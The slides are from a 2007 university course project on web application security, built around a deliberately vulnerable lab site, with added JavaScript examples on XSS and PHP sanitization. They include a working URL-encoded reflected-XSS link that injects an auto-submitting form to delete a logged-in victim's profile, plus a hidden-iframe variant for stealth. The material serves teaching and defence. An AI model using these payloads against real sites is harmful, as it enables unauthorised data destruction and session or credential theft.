Spring 2007 CS 155 Project 2: Web App Security Collin Jackson Part 1 Attacks.


Spring 2007
CS 155
Project 2: Web App Security
Collin Jackson
Part 1
Attacks
Overview
• Explore several attack types
• Requires both effectiveness and stealth
Learn:
• How an attacker can evade sanitization
• Consequences of an exploit
• JavaScript
• Very basic CSS

Attacks
(Diagram labels: link, email, badguy.com, zoobar.org, stanford.edu)
A: Cookie Theft
  - Use URL encoding
  - Could hijack session
B: Request Forgery
  - Navigate browser
  - Use iframes, forms
C: Password Theft
  - Evade sanitization
  - Handle DOM events
D: Profile Worm
  - Persistent attack
  - Replicates

Sanitization
Works differently depending on context
<tag property=" attackstring ">
  - Attack: break out of the attribute with ' or "
  - Defense: encode quotes as HTML entities (&quot;, &#039;); a backslash is not an escape character in HTML, so addslashes-style escaping does not close this hole
<body> attackstring </body>
  - Attack: launch script with < >
  - Attack: close off the parent tag with </tag>
  - Defense: escape angle brackets (&lt; &gt;)
eval( attackstring )
  - Attack: do whatever you want
  - Defense: don't do that (never pass untrusted input to eval)

Example: Profile Deleter
A malicious hyperlink deletes the profile of the user who clicks it
Only works when the user is logged in
  - User might have multiple tabs open
  - Might have chosen not to log out, or forgotten to
  - Link might appear in another user's profile
Uses the vulnerability in users.php from Attack A
Constructs a profile-deletion form and submits it

Find vulnerability
Site reflects the query parameter in an input field
Link can include anything we want here

Copy form data
View source to find the form fields
Create a copycat form with our modifications

URL encode
Use a URL encoder, e.g.:
http://scriptasylum.com/tutorials/encdec/encode-decode.html
http://www.dommermuth-1.com/protosite/experiments/encode/index.html
Payload closes the previous <input> and <form>
Button click triggers form submit

Debugging
It didn't work.
Open the JavaScript console and check the error: the form reference is undefined ("has no properties")
Cause: two forms with the same name, so looking the form up by name does not return the injected one

Fixed version
Now with the correct form (referenced by index rather than by name)

Final Test
http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E
Decoded, the user parameter is:
"></form><form method="POST" name=profileform
  action="/index.php">
<textarea name="profile_update"></textarea><br/>
<input type=submit name="profile_submit" value="Save Profile"></form>
<script>document.forms[1].profile_submit.click()</script>
The copied form posts to /index.php rather than users.php
Result: profile deleted

Stealthier approaches
Post the form into a hidden iframe, so the victim's page does not visibly navigate:
<form name=F action=/index.php target=myframe>…
<iframe name=myframe style="visibility:hidden">…
Or load the page that contains the real form in a hidden iframe and edit it from the outer page once the frame has loaded (possible only because the framed page is same-origin with the injected script):
<iframe name=myframe style="visibility:hidden">…
<script>frames.myframe.document.forms[0]
.profile_update.value = "";</script>

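The Profile Deleter walkthrough above, rebuilt as an added example (this is not code from the slides or from the zoobar project): it decodes the URL from the "Final Test" slide back to clear text, rebuilds a link from that text, shows why two forms named profileform defeat a lookup by name (the "Debugging" slide), and applies the hidden-iframe variant from "Stealthier approaches". SLIDE_URL is copied from the slide; the users.php template in renderUsersPage() is an assumption, with only the reflected value="…" and the pre-existing form named profileform taken from the slides.

```javascript
// Added example, not from the CS 155 slides or the zoobar project.
// SLIDE_URL is the link shown on the "Final Test" slide, joined into one line.
const SLIDE_URL =
  'http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform' +
  '%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E' +
  '%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E' +
  '%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E';

// The same payload in clear text, one slide line per entry; the slide's
// encoder used CR (%0D) as the line separator. The first line closes the
// reflected <input value="..."> and its <form>, the rest is the copycat
// form posting an empty profile, and the script submits it immediately.
const PAYLOAD = [
  '"></form><form method="POST" name=profileform',
  '  action="/index.php">',
  '<textarea name="profile_update"></textarea><br/>',
  '<input type=submit name="profile_submit" value="Save Profile"></form>',
  '<script>document.forms[1].profile_submit.click()</script>',
].join('\r');

// Decode the user= parameter of a users.php link back to clear text.
function decodePayload(url) {
  return decodeURIComponent(url.slice(url.indexOf('?user=') + 6));
}

// Build the link from clear text. encodeURIComponent() leaves . _ ( ) as-is
// where the slide's encoder wrote %2E %5F %28 %29, so the bytes differ from
// SLIDE_URL but the decoded payload is identical.
function buildLink(payload) {
  return 'http://zoobar.org/users.php?user=' + encodeURIComponent(payload);
}

// Assumed stand-in for the vulnerable users.php: the query parameter is
// reflected unescaped into an <input value="..."> that sits inside a form
// already named profileform. Only those two facts come from the slides.
function renderUsersPage(user) {
  return '<form name=profileform action="/users.php">' +
    '<input type="text" name="user" value="' + user + '">' +
    '</form>';
}

// The form names a browser would register for the rendered page, in order.
// Two forms named profileform is why the lookup by name on the "Debugging"
// slide came back undefined, and why the fixed payload addresses the
// injected form as document.forms[1].
function formNames(html) {
  const names = [];
  for (const m of html.matchAll(/<form\b[^>]*\bname=["']?([^"'\s>]+)/g)) names.push(m[1]);
  return names;
}

// "Stealthier approaches": give the copycat form a hidden iframe target so
// the victim's tab does not visibly navigate to the profile page.
function stealthyPayload() {
  return PAYLOAD
    .replace('name=profileform', 'name=profileform target=myframe')
    .replace('<script>', '<iframe name=myframe style="visibility:hidden"></iframe><script>');
}

console.log(decodePayload(SLIDE_URL) === PAYLOAD);                  // true
console.log(formNames(renderUsersPage(decodePayload(SLIDE_URL))));   // [ 'profileform', 'profileform' ]
```

Run it with node; the second line of output is the whole debugging story in one array, and buildLink(PAYLOAD) produces a working equivalent of the slide's link with different percent-encoding.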
Part 2
Defenses
Goals
A little programming knowledge can be a dangerous thing
Learn:
• How easy it is to make mistakes
• That even simple code can be hard to secure
• Techniques for appropriate input validation
• PHP
• Very basic SQL

File structure
index.php, users.php, transfer.php, login.php (only edit these files)
includes/
  - auth.php (cookie authentication)
  - common.php (includes everything else)
  - navigation.php (site template)
db/
  - zoobar/
      - Person.txt (must be writable by web server)
Includes /usr/class/cs155/projects/pp2/txt-db-api/…

txt-db-api
Third-party text-file database library
Data can be int, string, and autoincrement
Need to escape strings: \' \" \\
Actually magic_quotes_gpc does this for us (for GET, POST and cookie data; not for values read back from the database)
$recipient = $_POST['recipient']; // already escaped by magic_quotes_gpc
$sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
$rs = $db->executeQuery($sql);
if ($rs->next())
    $id = $rs->getCurrentValueByName('PersonID');

Defenses to Part 1
A: Cookie Theft
B: Request Forgery
C: Password Theft
D: Profile Worm

PHP Sanitization Techniques
addslashes(string)
  - Prepends a backslash to ' " \
  - Already done by magic_quotes_gpc
  - Inverse: stripslashes(string)
htmlspecialchars(string [, quote_style])
  - Converts & < > " to HTML entities
  - Use ENT_QUOTES to also convert ' to &#039;
strip_tags(string [, allowable_tags])
  - Max tag length 1024
  - Does not sanitize the attributes (properties) of the tags it allows
preg_replace(pattern, replacement, subject)
More info: http://php.net

More XSS hunting
Look for untrusted input used as output
Note the sanitization already applied to each variable
  - Form data has magic_quotes_gpc applied; data read from the database does not
Sanitize the output if necessary
  - No penalty for erring on the side of caution
  - But sanitizing multiple times may lead to problems (doubled backslashes, &amp;lt; instead of &lt;)
No credit for solving non-goals: SQL injection, etc.

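An added example serving both the Part 1 "Sanitization" slide and the two sanitization slides above (this is not code from the slides or from PHP itself): JavaScript imitations of addslashes, stripslashes, htmlspecialchars with ENT_QUOTES, and strip_tags, used to show that backslash escaping does not stop an attribute breakout while entity encoding does, that strip_tags leaves attributes on allowed tags, that encoding twice corrupts output, and that form data (already slash-escaped by magic_quotes_gpc) and database data need different handling on output. All inputs are constructed.

```javascript
// Added example, not from the CS 155 slides. JavaScript imitations of the PHP
// sanitizers from the "PHP Sanitization Techniques" slide; all inputs are
// constructed for illustration.

// PHP addslashes() / magic_quotes_gpc: backslash before ' " and \.
function addslashes(s) {
  return s.replace(/[\\'"]/g, (c) => '\\' + c);
}

// PHP stripslashes(): the inverse.
function stripslashes(s) {
  return s.replace(/\\(.)/g, '$1');
}

// PHP htmlspecialchars($s, ENT_QUOTES): & < > " ' become entities.
function htmlspecialchars(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// PHP strip_tags($s, $allowable): remove every tag whose name is not allowed.
// Like the PHP function, it leaves the attributes of allowed tags alone.
function stripTags(s, allowable = []) {
  const allowed = new Set(allowable.map((t) => t.toLowerCase()));
  return s.replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>/g,
    (tag, name) => (allowed.has(name.toLowerCase()) ? tag : ''));
}

// The first two output contexts from the Part 1 "Sanitization" slide.
function renderAttribute(s) {
  return '<input type="text" name="user" value="' + s + '">';
}
function renderBody(s) {
  return '<body>' + s + '</body>';
}

// Crude stand-in for the browser's tokenizer: more tags than the template
// itself contains means the payload escaped its context.
function countTags(html) {
  return (html.match(/<\/?[a-zA-Z][^>]*>/g) || []).length;
}

const attack = '"><script>alert(document.cookie)</script>';

// Attribute context: HTML has no backslash escape, so addslashes() leaves the
// breakout intact; entity-encoding the quote removes it.
function attributeBreaksOut(escaper) {
  return countTags(renderAttribute(escaper(attack))) > 1;
}

// Body context: only the angle brackets matter, and entities fix that too.
function bodyBreaksOut(escaper) {
  return countTags(renderBody(escaper(attack))) > 2;
}

// Pitfall 1 ("does not sanitize tag attributes"): an allowed <b> keeps its
// event handler, so strip_tags alone is not an XSS defence.
function stripTagsKeepsHandlers() {
  return stripTags('<b onmouseover="alert(1)">hi</b><script>evil()</script>', ['b']);
}

// Pitfall 2 ("sanitizing multiple times may lead to problems"): encoding an
// already-encoded value turns &lt; into &amp;lt;, and the page shows "&lt;".
function doubleEncoded() {
  return htmlspecialchars(htmlspecialchars('a < b'));
}

// Pitfall 3 ("form data has magic_quotes_gpc, db data does not"): undo the
// slashes on form data before encoding, or O'Brien is shown as O\'Brien;
// values read back through txt-db-api carry no slashes and must not be stripped.
function safeOutput(value, fromForm) {
  return htmlspecialchars(fromForm ? stripslashes(value) : value);
}

const postedName = addslashes("O'Brien");  // constructed: what $_POST['name'] holds

console.log(attributeBreaksOut(addslashes), attributeBreaksOut(htmlspecialchars)); // true false
console.log(safeOutput(postedName, true), htmlspecialchars(postedName));           // O&#039;Brien O\&#039;Brien
```

The escapers are passed in as functions so the same template can be checked with no escaping, backslash escaping, and entity encoding side by side; the pattern of choosing the encoder by output context, and tracking what has already been applied to each variable, is the one the grading slide asks for.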
Good luck!